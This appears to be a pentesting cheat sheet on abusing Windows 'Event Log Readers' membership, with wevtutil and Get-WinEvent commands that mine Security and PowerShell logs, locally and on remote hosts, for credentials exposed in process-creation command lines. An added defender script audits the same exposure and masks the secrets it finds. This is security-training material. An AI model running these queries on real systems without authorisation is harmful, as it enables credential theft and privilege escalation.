Exploiting Event Log Readers Group for Security Log Access

Verify Group Membership:

net localgroup "Event Log Readers"

Check if the user is a member of the "Event Log Readers" group.

Identify Audit Settings:

Determine if process creation auditing (Event ID 4688) and command-line logging are enabled.

Query Security Logs using wevtutil:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Search for credential usage in the security logs.

wevtutil qe Security /rd:true /f:text /r:<remote_host> /u:<user> /p:<password> | findstr "/user"

Remotely query security logs with credentials.

Query Security Logs using Get-WinEvent:

Get-WinEvent -LogName security | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Search for credential usage in process creation events.

Get-WinEvent -LogName security -ComputerName <remote_host> -Credential <PSCredential> | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}

Remote query using specific credentials.

Explore PowerShell Operational Logs:

Examine the PowerShell Operational log for sensitive information if script block or module logging is enabled.
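The checks above, combined into one defender-side audit script (added here; not from the original page). It assumes it runs locally with administrator rights, that the Process Creation subcategory name is in English, and that $Patterns is a constructed list of credential markers to look for in 4688 command lines.

```powershell
# Constructed list of markers that commonly precede a secret on a command line.
$Patterns = @('/user:', '/p:', 'password=', '-p ')

function Get-EventLogReaders {
    # Anyone listed here can read the Security log without being an administrator.
    Get-LocalGroupMember -Group 'Event Log Readers' -ErrorAction SilentlyContinue |
        Select-Object Name, ObjectClass, PrincipalSource
}

function Test-ProcessCreationAuditing {
    # 4688 needs the Process Creation subcategory; the command line lands in
    # Properties[8] only when ProcessCreationIncludeCmdLine_Enabled is 1.
    $audit = (auditpol /get /subcategory:"Process Creation" /r | ConvertFrom-Csv).'Inclusion Setting'
    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    $cmd   = (Get-ItemProperty -Path $key -Name ProcessCreationIncludeCmdLine_Enabled `
                -ErrorAction SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled
    [pscustomobject]@{
        ProcessCreationAudit = $audit
        CommandLineLogging   = ($cmd -eq 1)
    }
}

function Find-CredentialsInProcessCreation {
    param([int]$MaxEvents = 5000)
    $filter = @{ LogName = 'Security'; Id = 4688 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $line = $_.Properties[8].Value   # CommandLine field of 4688
            foreach ($p in $Patterns) {
                if ($line -and $line -like "*$p*") {
                    # Report the process that leaked, but mask the value after the
                    # marker so the finding does not re-expose the secret.
                    [pscustomobject]@{
                        Time    = $_.TimeCreated
                        Process = $_.Properties[5].Value   # NewProcessName
                        Marker  = $p
                        Masked  = ($line -replace '(?i)(/user:|/p:|password=|-p )\S+', '$1<redacted>')
                    }
                    break
                }
            }
        }
}

Get-EventLogReaders
Test-ProcessCreationAuditing
Find-CredentialsInProcessCreation | Format-Table -AutoSize
```

Any hit from Find-CredentialsInProcessCreation means a secret is sitting in a log that every Event Log Readers member can read; rotate it and fix the invoking script or scheduled task.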

Commands:

  • net localgroup "Event Log Readers"

  • wevtutil qe Security

  • findstr

PowerShell Cmdlets:

  • Get-WinEvent

  • Select-String

  • Where-Object

Techniques:

  • Leverage "Event Log Readers" group membership to access security logs.

  • Search for sensitive information (credentials, command-line parameters) within event logs.

  • Use wevtutil and Get-WinEvent to query and filter event log data.

  • Explore PowerShell Operational logs for potential credential leaks.

  • Understand the importance of process creation auditing and command-line logging.
